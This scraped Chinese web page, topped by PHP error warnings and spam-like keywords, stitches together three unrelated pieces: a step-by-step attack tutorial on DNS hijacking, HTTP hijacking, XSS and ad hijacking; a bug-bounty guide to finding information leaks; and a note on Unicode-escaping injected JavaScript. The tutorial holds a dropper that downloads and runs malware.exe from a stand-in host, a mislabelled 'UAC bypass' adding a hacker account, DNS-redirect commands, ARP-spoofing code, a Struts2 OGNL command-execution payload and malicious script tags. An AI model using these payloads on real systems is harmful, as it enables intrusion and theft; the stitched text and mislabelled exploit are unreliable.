Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 Warning: error_log(/data/www/wwwroot/hmttv.cn/caches/error_log.php): failed to open stream: Permission denied in /data/www/wwwroot/hmttv.cn/phpcms/libs/functions/global.func.php on line 537 国产成人免费观看,亚洲伦理中文字幕一区,成人综合视频网

          整合營(yíng)銷服務(wù)商

          電腦端+手機(jī)端+微信端=數(shù)據(jù)同步管理

          免費(fèi)咨詢熱線:

          關(guān)于DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的詳

          關(guān)于DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的詳細(xì)分析-實(shí)戰(zhàn)篇

          供學(xué)習(xí)研究交流使用,切勿用于違法犯罪,為維護(hù)網(wǎng)絡(luò)安全做貢獻(xiàn)!

          一、DNS劫持

          1. 修改本地DNS設(shè)置

          步驟一:物理訪問(wèn)或惡意軟件感染

          惡意軟件感染

          • 攻擊者通過(guò)釣魚郵件或惡意網(wǎng)站誘導(dǎo)用戶下載并運(yùn)行惡意軟件。

          python

          復(fù)制代碼

          # 示例Python代碼,惡意軟件偽裝成合法軟件 import os def download_payload(): # 下載惡意軟件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 執(zhí)行下載的惡意軟件 os.system("malware.exe") download_payload() execute_payload()

          步驟二:獲取管理員權(quán)限

          提權(quán)方法

          • 惡意軟件利用系統(tǒng)漏洞提升權(quán)限,例如通過(guò)Windows UAC繞過(guò)或使用已知的提權(quán)漏洞。

          示例漏洞:CVE-2019-1388

          • CVE-2019-1388是一個(gè)Windows UAC繞過(guò)漏洞,攻擊者可以通過(guò)偽造的簽名窗口提升權(quán)限。

          利用示例

          1. 創(chuàng)建惡意文件

          c

          復(fù)制代碼

          // Exploit.c: 利用CVE-2019-1388的UAC繞過(guò)漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize=sizeof(SHELLEXECUTEINFO); shExecInfo.fMask=SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd=NULL; shExecInfo.lpVerb="runas"; // 請(qǐng)求管理員權(quán)限 shExecInfo.lpFile="cmd.exe"; // 要運(yùn)行的程序 shExecInfo.lpParameters="/c net user hacker Password123! /add"; // 創(chuàng)建新用戶 shExecInfo.lpDirectory=NULL; shExecInfo.nShow=SW_SHOWNORMAL; shExecInfo.hInstApp=NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }

          1. 編譯并運(yùn)行惡意文件

          shell

          復(fù)制代碼

          gcc Exploit.c -o Exploit.exe Exploit.exe

          步驟三:修改DNS設(shè)置

          使用命令提示符

          shell

          復(fù)制代碼

          # 修改DNS設(shè)置,將DNS服務(wù)器地址更改為攻擊者控制的DNS服務(wù)器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5

          修改注冊(cè)表

          shell

          復(fù)制代碼

          # 示例命令,修改注冊(cè)表中的DNS設(shè)置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f

          步驟四:DNS解析劫持

          • 當(dāng)用戶訪問(wèn)合法域名時(shí),DNS請(qǐng)求被發(fā)送到攻擊者控制的DNS服務(wù)器,返回偽造的IP地址,重定向用戶到惡意網(wǎng)站。

          2. 攻擊DNS服務(wù)器

          步驟一:識(shí)別目標(biāo)DNS服務(wù)器

          • 使用工具如nslookup、whois或dig來(lái)識(shí)別DNS服務(wù)器的IP地址和相關(guān)信息。

          shell

          復(fù)制代碼

          # 使用nslookup識(shí)別DNS服務(wù)器 nslookup example.com

          步驟二:漏洞利用或暴力破解

          • 利用DNS服務(wù)器軟件的已知漏洞,例如BIND DNS服務(wù)器中的漏洞CVE-2020-8617,或通過(guò)暴力破解獲取管理員權(quán)限。

          shell

          復(fù)制代碼

          # 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit

          步驟三:篡改DNS解析記錄

          • 登錄DNS服務(wù)器的管理界面,修改DNS解析記錄,將合法域名解析為惡意IP地址。

          shell

          復(fù)制代碼

          # 例如,在BIND DNS服務(wù)器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析記錄 zone "example.com" { type master; file "/etc/bind/db.example.com"; };

          步驟四:劫持用戶請(qǐng)求

          • 所有請(qǐng)求該DNS服務(wù)器解析域名的用戶都會(huì)被重定向到惡意網(wǎng)站。

          二、HTTP劫持

          中間人攻擊(MITM)

          步驟一:建立中間人位置

          ARP欺騙

          python

          復(fù)制代碼

          # 使用scapy庫(kù)進(jìn)行ARP欺騙 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response=ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:將目標(biāo)IP的網(wǎng)關(guān)MAC地址更改為攻擊者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')

          步驟二:攔截HTTP請(qǐng)求

          捕獲HTTP流量

          shell

          復(fù)制代碼

          # 使用Wireshark或tcpdump捕獲HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'

          步驟三:篡改HTTP響應(yīng)

          使用Burp Suite攔截并修改HTTP響應(yīng)

          • 在Burp Suite中設(shè)置攔截規(guī)則,攔截HTTP響應(yīng)并插入惡意代碼。

          html

          復(fù)制代碼

          <!-- 插入惡意JavaScript代碼的示例 --> <script>alert('This site is hacked');</script>

          步驟四:執(zhí)行惡意代碼

          • 用戶瀏覽器接收并執(zhí)行篡改后的HTTP響應(yīng),執(zhí)行其中的惡意代碼。

          三、內(nèi)容注入

          XSS(跨站腳本)攻擊

          步驟一:發(fā)現(xiàn)注入點(diǎn)

          • 攻擊者在論壇、評(píng)論區(qū)或其他用戶輸入?yún)^(qū)域進(jìn)行測(cè)試,尋找可以插入JavaScript代碼的注入點(diǎn)。

          步驟二:構(gòu)造惡意代碼

          html

          復(fù)制代碼

          <!-- 示例:構(gòu)造包含惡意JavaScript代碼的輸入 --> <script>alert('XSS');</script>

          步驟三:注入惡意代碼

          • 攻擊者將惡意代碼輸入到注入點(diǎn),提交表單或發(fā)布評(píng)論。

          步驟四:執(zhí)行惡意代碼

          • 服務(wù)器未對(duì)輸入進(jìn)行適當(dāng)過(guò)濾,直接返回包含惡意代碼的響應(yīng)。用戶瀏覽器執(zhí)行惡意代碼,攻擊者實(shí)現(xiàn)控制。

          四、廣告劫持

          劫持第三方廣告網(wǎng)絡(luò)

          步驟一:識(shí)別目標(biāo)廣告網(wǎng)絡(luò)

          • 攻擊者通過(guò)分析廣告腳本和網(wǎng)絡(luò)流量,確定廣告網(wǎng)絡(luò)的來(lái)源和結(jié)構(gòu)。

          javascript

          復(fù)制代碼

          // 分析廣告腳本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));

          步驟二:漏洞利用或社會(huì)工程學(xué)

          • 利用廣告網(wǎng)絡(luò)的漏洞或通過(guò)社會(huì)工程學(xué)手段獲取廣告網(wǎng)絡(luò)管理權(quán)限。

          示例漏洞:CVE-2018-11776

          • 這是一個(gè)Apache Struts的遠(yuǎn)程代碼執(zhí)行漏洞,攻擊者可以通過(guò)特定的輸入導(dǎo)致遠(yuǎn)程代碼執(zhí)行。

          利用示例

          1. 創(chuàng)建惡意請(qǐng)求

          http

          復(fù)制代碼

          POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

          1. 發(fā)送惡意請(qǐng)求
          • 使用工具如curl或Burp Suite發(fā)送惡意請(qǐng)求,觸發(fā)漏洞。

          步驟三:替換廣告內(nèi)容

          • 攻擊者登錄廣告網(wǎng)絡(luò)管理界面,將合法廣告替換為惡意廣告,內(nèi)容包括惡意JavaScript代碼或重定向鏈接。

          html

          復(fù)制代碼

          <!-- 替換廣告內(nèi)容為惡意廣告 --> <script src="http://malicious-website.com/malicious.js"></script>

          步驟四:加載惡意廣告

          • 用戶瀏覽包含被劫持廣告的網(wǎng)頁(yè)時(shí),惡意廣告加載并執(zhí)行,其中的惡意代碼或重定向鏈接開(kāi)始運(yùn)行。

          html

          復(fù)制代碼

          <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 惡意廣告加載 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>

          結(jié)論

          通過(guò)詳細(xì)的步驟和代碼示例,我們可以更清楚地了解DNS劫持、HTTP劫持、內(nèi)容注入和廣告劫持的實(shí)現(xiàn)方式。這些攻擊手段對(duì)用戶和網(wǎng)絡(luò)安全構(gòu)成嚴(yán)重威脅,但通過(guò)了解其原理和實(shí)現(xiàn)細(xì)節(jié),我們可以采取更有效的防護(hù)措施,保護(hù)我們的網(wǎng)絡(luò)環(huán)境和數(shù)據(jù)安全。如果你有任何問(wèn)題或想法,請(qǐng)?jiān)谠u(píng)論區(qū)分享,我們一起探討。

          家好,我是劍影,這是我的第五篇原創(chuàng)文章。1月已經(jīng)過(guò)半,很多童鞋應(yīng)該都放寒假了,那么挖掘漏洞的時(shí)間就比較多啦,在挖掘的過(guò)程中,思路的積累以及創(chuàng)新是尤為重要的。在寫這篇文章前,我實(shí)際上還沒(méi)想好該寫什么內(nèi)容,然后回顧了以往挖掘各大SRC漏洞的歷程,覺(jué)得寫關(guān)于信息泄露這方面的問(wèn)題比較OK些,于是,我根據(jù)自己的挖掘思路和網(wǎng)上的思路做了一個(gè)總結(jié),希望能讓你們學(xué)有收獲。

          信息漏洞的危害涉及到企業(yè)和用戶,一直以來(lái)都是高風(fēng)險(xiǎn)的問(wèn)題,本文章就兩個(gè)方向進(jìn)行講述挖掘信息泄露的那些思路。

          Web方面的信息泄露

          0x01 用戶信息泄露

          ①:評(píng)論處

          第一點(diǎn):

          一般用戶評(píng)論處用戶的信息都是加密的,比如顯示的是用戶手機(jī)號(hào)或郵箱等,就會(huì)直接對(duì)中間的一段數(shù)字進(jìn)行加密,但是有些可能就沒(méi)有加密,而是直接顯示出來(lái),那么這就造成了用戶信息泄露問(wèn)題。

          第二點(diǎn):

          如果加密不當(dāng),直接游覽用戶評(píng)論處時(shí)進(jìn)行抓包,然后查看返回包就可以直接看到明文,但有的時(shí)候會(huì)有2個(gè)參數(shù),就比如name:1333******1這個(gè)值是加密的,但后面還會(huì)有一個(gè)testname這個(gè)參數(shù)就沒(méi)有進(jìn)行加密,從而導(dǎo)致用戶信息泄露。這里有一些小技巧,就比如一個(gè)買賣市場(chǎng),他有用戶評(píng)論的地方,有一個(gè)秒殺搶購(gòu)成功的展示用戶的地方,還有一個(gè)是用戶相互交流的地方,一般白帽子測(cè)試了第一個(gè)功能處發(fā)現(xiàn)不存在問(wèn)題,然后就不繼續(xù)測(cè)試其它相同功能處了,這個(gè)疏忽就可能會(huì)導(dǎo)致錯(cuò)過(guò)一個(gè)發(fā)現(xiàn)問(wèn)題的機(jī)會(huì),每個(gè)功能處,加密機(jī)制有時(shí)候就會(huì)被漏掉,就比如用戶評(píng)論處用戶信息加了密,但是秒殺搶購(gòu)成功的展示用戶的地方卻沒(méi)有加密,所以白帽子要更細(xì)心點(diǎn)。

          第三點(diǎn):

          一般評(píng)論處都會(huì)有一個(gè)追加評(píng)論功能和一個(gè)商家回復(fù)功能,那么此時(shí)如果對(duì)這個(gè)功能參數(shù)沒(méi)有加以加密,那么通過(guò)抓包游覽查看返回包就可看到追加評(píng)論的用戶信息和商家信息。

          第四點(diǎn):

          有些評(píng)論功能當(dāng)中支持艾特(@)他人,那么在這個(gè)評(píng)論當(dāng)中你通過(guò)@他人,然后輸入信息點(diǎn)擊發(fā)送到評(píng)論處時(shí),通關(guān)抓包就可看到剛剛@的那個(gè)用戶的明文信息。

          第五點(diǎn):

          當(dāng)這個(gè)網(wǎng)站評(píng)論地方被搜索引擎爬蟲到了,那么可以嘗試?yán)盟阉髅顂ite:XXXX.com inurl:XX目錄在搜索引擎當(dāng)中搜索,如果加密不完全,那么就可以在搜索引擎當(dāng)中看到明文信息。關(guān)于這類的信息泄露問(wèn)題我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0104766.html

          ②:轉(zhuǎn)賬處

          第一點(diǎn):

          很多大型公司都有自家的金融平臺(tái),然后在轉(zhuǎn)賬處,當(dāng)你輸入對(duì)方的轉(zhuǎn)賬的賬戶,比如手機(jī)號(hào)或者郵箱,然后當(dāng)你點(diǎn)擊其它地方,它會(huì)向服務(wù)器發(fā)送一條驗(yàn)證信息,驗(yàn)證輸入的此賬戶是否存在,如果存在,返回對(duì)應(yīng)的手機(jī)號(hào)或者郵箱賬戶的用戶姓名,比如*王(1333333XXX)這樣的返回信息,那么如果此時(shí)前端加密不當(dāng),可以通過(guò)抓包攔截這條請(qǐng)求,查看返回信息,就可看到明文的姓名。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0124969.html

          第二點(diǎn):

          一般在轉(zhuǎn)賬處輸入手機(jī)號(hào)或郵箱賬戶的旁邊,有一個(gè)歷史轉(zhuǎn)賬信息,一個(gè)迷你的小頁(yè)面,當(dāng)你點(diǎn)擊后會(huì)看到之前轉(zhuǎn)賬成功的信息,但是,如果此頁(yè)面加密不全,那么在點(diǎn)擊查看歷史轉(zhuǎn)賬信息時(shí)直接抓包查看返回內(nèi)容就可看到明文的姓名。

          ③:搜索處

          第一點(diǎn):

          有些平臺(tái)內(nèi)置了搜索功能,跟搜索引擎思路很像,同樣也是隨意搜索,如果此時(shí)搜索的結(jié)果包含用戶信息這塊,那么就可能會(huì)導(dǎo)致用戶信息泄露問(wèn)題。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-069909.html

          ④:個(gè)人頁(yè)面處

          第一點(diǎn):

          在個(gè)人頁(yè)面當(dāng)中,直接游覽時(shí)直接抓包,查看返回包就可看到用戶信息是否未加密完全。比如一些金融APP,如果加密不當(dāng),當(dāng)點(diǎn)擊個(gè)人界面時(shí)通過(guò)抓包查看返回包就可看到明文的身份證信息和用戶名以及手機(jī)號(hào)。當(dāng)然這里不是只有涉及金融APP方面的才會(huì)有這個(gè)問(wèn)題,只要是可以查看個(gè)人頁(yè)面處都可能存在。

          第二點(diǎn):

          在查看銀行卡信息那里,一般都是加了密的,但查看銀行卡信息處時(shí)進(jìn)行抓包查看返回包的時(shí)候就可看到明文的銀行卡卡號(hào)信息和姓名信息。

          ⑤:客服處

          第一點(diǎn):

          這個(gè)問(wèn)題屬于客服安全方面意思不足,大一點(diǎn)的來(lái)看就是公司沒(méi)有對(duì)客服進(jìn)行安全培訓(xùn)等,當(dāng)你詢問(wèn)客服某手機(jī)號(hào)對(duì)應(yīng)的姓名時(shí),客服就會(huì)直接把姓名發(fā)你,當(dāng)然這要考驗(yàn)?zāi)闶窃趺磫?wèn)的了,還有如果失敗了不要放棄,換一個(gè)客服繼續(xù)測(cè)試。

          越權(quán)方面的用戶信息泄露

          ①:任意查看

          第一點(diǎn):

          很多平臺(tái)需要進(jìn)行實(shí)名制認(rèn)證,在上傳實(shí)名制所需要的身份證照片等信息圖片時(shí),如果沒(méi)有對(duì)所產(chǎn)生的文件名格式進(jìn)行復(fù)雜化的話,那么極有可能會(huì)存在任意查看,通過(guò)批量的方式就可以進(jìn)行這些步驟,比如你上傳了圖片,服務(wù)器生成的圖片地址是XXX.com/xxx/xx/012313.jpg這樣短的數(shù)字格式文件名的話,就會(huì)存在該問(wèn)題。

          第二點(diǎn):

          購(gòu)物平臺(tái)當(dāng)中,在添加地址或修改地址的地方,如果權(quán)限沒(méi)過(guò)濾好,就可以越權(quán)進(jìn)行查看任意用戶的地址信息。

          第三點(diǎn):

          在某些平臺(tái)當(dāng)中,支持添加子賬戶,然后隨便添加一個(gè)子賬戶,然后在查看該子賬戶的時(shí)候進(jìn)行抓包,修改其ID值,就可以查看任意賬戶信息

          第四點(diǎn):

          有些平臺(tái)有操作日志或其它日志功能,那么如果此時(shí)對(duì)當(dāng)前用戶的權(quán)限過(guò)濾不當(dāng),那么就可以查看全部用戶操作時(shí)產(chǎn)生的日志,從而導(dǎo)致信息泄露。

          第五點(diǎn):

          在很多金融平臺(tái)當(dāng)中,在修改昵稱那里或者查看個(gè)人信息那里,提交時(shí)抓包,修改其用戶值為存在用戶的任意值,那么就可能造成查看任意用戶信息的問(wèn)題。

          第六點(diǎn):

          如果你進(jìn)入了一些內(nèi)部員工平臺(tái),那么如果具有搜索功能,就比如你輸入了員工工號(hào)然后它會(huì)返回這個(gè)員工的所有在職信息,那么此時(shí)你可以通過(guò)抓包批量進(jìn)行提交員工工號(hào),就可造成大范圍的信息泄露。

          第七點(diǎn):

          隨便買一個(gè)東西生成訂單,如果此時(shí)權(quán)限控制不當(dāng),就可以越權(quán)查看到任意用戶的訂單,那么信息也自認(rèn)而然的泄露出來(lái)了。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-083157.html

          ②:任意重置

          第一點(diǎn):

          如果權(quán)限控制不當(dāng),可導(dǎo)致任意用戶密碼修改的話,那么登錄后就可查看該用戶的任意信息,這也就導(dǎo)致了用戶信息泄露。

          ③:任意修改

          第一點(diǎn):

          在下單的時(shí)候修改其用戶ID為任意存在用戶的ID,然后下單,然后查看剛剛下單的信息,就可看到該用戶的收貨地址信息,只要對(duì)方設(shè)置了收貨地址。接口方面的用戶信息泄露

          第一點(diǎn):

          很多業(yè)務(wù)網(wǎng)站在上線的時(shí)候都忘記把測(cè)試時(shí)的接口進(jìn)行關(guān)閉,從而導(dǎo)致這個(gè)接口可以查詢大量用戶信息。那么此類接口怎么找呢?其中之一的方法通過(guò)Github.com網(wǎng)站進(jìn)行搜索相關(guān)域名進(jìn)行查找。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0116563.html注入方面的用戶信息泄露

          第一點(diǎn):

          注入可以說(shuō)是非常非常的嚴(yán)重,因?yàn)樽⑷胪寄艿玫胶芏嘈畔ⅲ绻麤](méi)做好相關(guān)過(guò)濾以及防護(hù),就可導(dǎo)致注入,從而數(shù)據(jù)庫(kù)內(nèi)的各種數(shù)據(jù)面對(duì)裸露的危險(xiǎn)。

          以上就是關(guān)于挖掘用戶信息泄露方向的思路了,我試著努力回想,但目前只能總結(jié)到這幾個(gè)點(diǎn),如果還有更多思路,歡迎在評(píng)論處留言!

          0x02 服務(wù)器路徑信息泄露

          ①:上傳圖片處

          第一點(diǎn):

          在上傳圖片處,這里我說(shuō)下最可能存在問(wèn)題的點(diǎn),就是關(guān)于上傳相關(guān)證明,進(jìn)行實(shí)名制上傳信息等功能頁(yè)面,在上傳圖片時(shí)進(jìn)行抓包,然后查看返回包,那么就可看到當(dāng)前服務(wù)器的絕對(duì)路徑信息。

          ②:XML處

          第一點(diǎn):

          一些XML限制或刪除不完全,可導(dǎo)致服務(wù)器等信息泄露。詳細(xì)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0123762.html

          ③:第三方的服務(wù)當(dāng)中

          第一點(diǎn):

          很多,如:Apache Tomcat、Struts2、CMS、zabix、Nginx等等,例如Nginx的某版本解析漏洞,就可造成路徑信息泄露。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2013-019253.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-04655.html

          ④:利用報(bào)錯(cuò)問(wèn)題

          第一點(diǎn):

          在處理報(bào)錯(cuò)信息的問(wèn)題上如果處理不當(dāng),就可導(dǎo)致路徑信息泄露,比如訪問(wèn)一些不存在的文件等思路。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2012-010115.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2011-02219.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2012-09901.html

          以上就是關(guān)于服務(wù)器路徑信息泄露問(wèn)題!

          0x03 員工信息泄露

          ①:各第三方平臺(tái)當(dāng)中

          第一點(diǎn):

          Github,很不錯(cuò)的開(kāi)源社區(qū)平臺(tái)。一些員工喜歡將自己的信息上傳到這平臺(tái)上,但是往往忽視了安全,有時(shí)這上傳的代碼當(dāng)中就可能包含很多內(nèi)部測(cè)試員工的賬戶以及密碼信息等。關(guān)于這方面我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0177720.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-0164337.html

          第二點(diǎn):

          在搜索QQ群那里,通過(guò)搜索企業(yè)昵稱,往往都可以搜索出來(lái)關(guān)于企業(yè)員工或企業(yè)方面的信息,一般都會(huì)貼在公告當(dāng)中,比如某某測(cè)試賬戶等。當(dāng)然,你也可以申請(qǐng)加入群進(jìn)行查看群文件,看是否有銘感的信息。這里我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0128511.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2015-093927.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0208105.html

          第三點(diǎn):

          百度貼吧當(dāng)中,一般都有公司員工創(chuàng)建的貼吧,如果安全意思不足,那么就會(huì)泄露相關(guān)員工工號(hào),可用作暴力破解的字典。

          ②:弱密碼問(wèn)題

          第一點(diǎn):

          在一些涉及內(nèi)部員工方面的系統(tǒng),如果員工密碼為弱密碼,那么就可通過(guò)暴力破解方式進(jìn)行嘗試登錄,如果成功爆破到了員工賬戶,那么一般只要是內(nèi)部員工系統(tǒng)該賬戶都可以登錄,那么所造成的影響也是很大的。

          以上就是關(guān)于員工信息泄露的問(wèn)題!

          0x04 數(shù)據(jù)庫(kù)信息以及服務(wù)器信息泄露

          ①:各第三方平臺(tái)當(dāng)中

          第一點(diǎn):

          Github,一些員工如果安全意識(shí)不足,同樣上傳的代碼當(dāng)中就包含了數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息。關(guān)于這類問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0180848.html

          第二點(diǎn):

          利用搜索QQ群的思路,如果員工的安全意識(shí)不足,那么數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息就會(huì)在公告或群文件當(dāng)中

          ②:XML處

          第一點(diǎn):

          同樣在XML文件當(dāng)中,也可能會(huì)發(fā)現(xiàn)數(shù)據(jù)庫(kù)連接信息以及服務(wù)器信息。

          ③:svn處

          第一點(diǎn):

          svn是一個(gè)開(kāi)放源代碼的版本控制系統(tǒng),如果沒(méi)有加以限制或者刪除,那么就可以游覽相關(guān)的比較隱蔽性的源碼。關(guān)于這類的問(wèn)題,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2016-0199607.htmlhttp://wooyun.jozxing.cc/static/bugs/wooyun-2016-0191202.html

          ③:數(shù)據(jù)庫(kù)文件

          第一點(diǎn):

          一些數(shù)據(jù)庫(kù)相關(guān)文件如果刪除不當(dāng)或者擺放位置不當(dāng),那么極有可能被下載下來(lái),造成危害。關(guān)于這方面,我找到了相關(guān)例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0158556.html

          ④:其它文件

          第一點(diǎn):

          比如其它類型的文件,如Txt、Doc、Excel等文件,如果包含銘感信息,那么危害也是顯而易見(jiàn)的。以上就是關(guān)于數(shù)據(jù)庫(kù)信息以及服務(wù)器信息泄露的問(wèn)題!

          APP方面的信息泄露

          0x01 敏感域名泄露

          ①:本地文件當(dāng)中

          第一點(diǎn):

          一些比較隱私性的域名可能會(huì)包含在APP本地文件當(dāng)中,比如某內(nèi)部員工登錄系統(tǒng)的APP,但是由于有證書校驗(yàn),你也抓不到數(shù)據(jù)包,此時(shí)你可以查看該APP的本地文件,然后就可看到本APP內(nèi)調(diào)用的是哪些域名,然后還有相關(guān)的域名。從APP內(nèi)提取域名的相關(guān)程序很多,Github很多,這里我提供一個(gè)某作者寫的Windows下的工具吧,需要Net環(huán)境哦,下載地址:https://pan.baidu.com/s/1slJaYnF

          0x02 密碼泄露

          第一點(diǎn):

          手勢(shì)密碼也存在在本地文件當(dāng)中,如果沒(méi)最好相關(guān)校驗(yàn)或加密,那么手勢(shì)密碼就可能會(huì)泄露并且被利用。

          第二點(diǎn):

          一些APP問(wèn)題就是把用戶登錄的信息保存在本地,而且賬戶密碼都是以明文保存在本地文件或本地Sqlite數(shù)據(jù)庫(kù)當(dāng)中,很容易被利用。這里我找到了類似的例子:http://wooyun.jozxing.cc/static/bugs/wooyun-2011-02915.html

          第三點(diǎn):

          同樣,一些APP也會(huì)把登錄成功的Cookie保存在本地,那么只要找到相關(guān)文件復(fù)制下來(lái)這個(gè)Cookie,就可以任意登錄了。

          當(dāng)然,訪問(wèn)這些文件是需要ROOT權(quán)限的,以上就是APP方面的信息泄露問(wèn)題了!

          總結(jié):

          信息泄露不管是泄露哪方面的,都需要重視,信息一直伴隨著每個(gè)人到終身,如何才能保證在這個(gè)過(guò)程當(dāng)中不被泄露和利用,那么就需要各位白帽子來(lái)維護(hù)以及廠商來(lái)重視,讓信息化的今天,更安全。感謝那些支持我的朋友們,你們的一點(diǎn)點(diǎn)支持對(duì)我來(lái)說(shuō)都有著莫大的鼓勵(lì)。最后,發(fā)現(xiàn)問(wèn)題,解決問(wèn)題,讓世界更美,下次文章見(jiàn)~

          登錄安全客 - 有思想的安全新媒體www.anquanke.com/,或下載安全客APP來(lái)獲取更多最新資訊吧~

          景說(shuō)明

          假設(shè)需要劫持http響應(yīng)并在html頁(yè)面中注入一段js代碼后再傳回瀏覽器,實(shí)現(xiàn)在瀏覽器出現(xiàn)一個(gè)彈框消息提醒。

          由于原始html頁(yè)面編碼格式存在UTF-8、GBK等多種編碼格式,如果注入的js包含中文消息的話,那么在UTF-8或GBK編碼的頁(yè)面就會(huì)有一個(gè)出現(xiàn)亂碼。有沒(méi)有辦法做到不管是針對(duì)GBK、UTF-8編碼的頁(yè)面都能做到正常顯示而不會(huì)出現(xiàn)亂碼哪?

          產(chǎn)生亂碼的原因

          首先來(lái)分析一下產(chǎn)生亂碼的原因,我們?cè)跒g覽器看到的信息都是通過(guò)圖形學(xué)手段在顯示器上呈現(xiàn)出來(lái)的,而實(shí)際保存在計(jì)算機(jī)硬件上的都是0和1(因?yàn)橛?jì)算機(jī)實(shí)現(xiàn)是基于二進(jìn)制),那么計(jì)算機(jī)要顯示、傳遞信息就需要依靠一套規(guī)則把一串串的0和1識(shí)別為正確的字符,這就是編碼。

          例如01000001在ASCII編碼規(guī)則下對(duì)應(yīng)字母A。相同的0/1串,不同的編碼解析出的字符一般是不同的,因此如果html頁(yè)面按照UTF-8的編碼解析正常,那么按照GBK的編碼解析就會(huì)是亂碼了。根據(jù)上面的示意圖,假設(shè)注入的js代碼為utf-8編碼格式,而原始html編碼格式也為UTF-8編碼格式,那么最終注入這部分中的中文就能正常顯示,但是如果原始html為GBK編碼,那注入的這部分js代碼的中文就會(huì)顯示亂碼。

          解決辦法

          有一種unicode統(tǒng)一編碼字符集,目標(biāo)是把所有文字、字符統(tǒng)一編碼,也就是一串0/1組合在unicode字符集下對(duì)應(yīng)的字符是唯一的,不會(huì)存在歧義。而js是支持解析unicode字符的,那么就可以在注入js中把要顯示的消息統(tǒng)一轉(zhuǎn)換為unicode編碼,瀏覽器端去解析這個(gè)unicode編碼,這樣不管原始html是UTF-8還是GBK,都能正常顯示中文。

          原始注入js代碼關(guān)于中文字符的部分

          // utf-8編碼格式
          let message="中文";

          解決亂碼的注入js代碼關(guān)于中文字符的部分

          // utf-8編碼格式
          let message="\\u4e2d\\u6587";  // 這個(gè)編碼對(duì)應(yīng)上面的message"中文"

          注意:

          1. 注入的js代碼仍然是utf-8編碼格式,只是消息內(nèi)容轉(zhuǎn)換為unicode編碼的形式;
          2. unicode中0x4e2d表示的0/1串對(duì)應(yīng)漢字"中",0x6587對(duì)應(yīng)的0/1串對(duì)應(yīng)漢字"文";
          3. message其實(shí)也不是真正的unicode編碼,它只是普通的字符串,只是使用了unicode對(duì)應(yīng)的碼點(diǎn)(也就是二進(jìn)制對(duì)應(yīng)的數(shù)值),因?yàn)榭梢岳眠@個(gè)碼點(diǎn)在瀏覽器中恢復(fù)出正確的字符,事實(shí)上unicode字符集并沒(méi)有規(guī)定具體的編碼格式。

